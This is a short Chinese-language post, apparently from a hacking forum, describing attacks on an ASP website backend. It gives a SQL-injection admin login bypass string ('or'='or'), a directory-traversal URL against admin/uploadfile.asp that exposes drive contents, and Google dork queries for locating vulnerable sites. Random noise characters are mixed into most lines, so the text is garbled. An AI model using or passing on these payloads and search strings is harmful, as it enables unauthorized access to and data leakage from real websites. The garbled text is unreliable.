后台万能密码 'or'='or'
; N$ _: |" K, x% E! i; S6 ?( s7 l: |# V" V I
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!7 @3 k: O+ C: Y( y/ s$ W1 r
admin/uploadfile.asp?currentFolder=/upfiles/../
' h: `7 p/ g- n/ m
' j" O0 M' X6 q1 d. _漏洞证明:4 S/ y* }6 o9 p, u6 L4 `6 R
4 } G- W+ D, G* i" [+ R谷歌:inurl:type.asp?id=1 新闻中心
% H) U' ~- C2 }+ w5 a: H或者 :inurl:download_ok.asp?0 e8 Q5 R- I7 a: q) a
; l. b# o7 t+ N4 _6 y4 _7 `( g |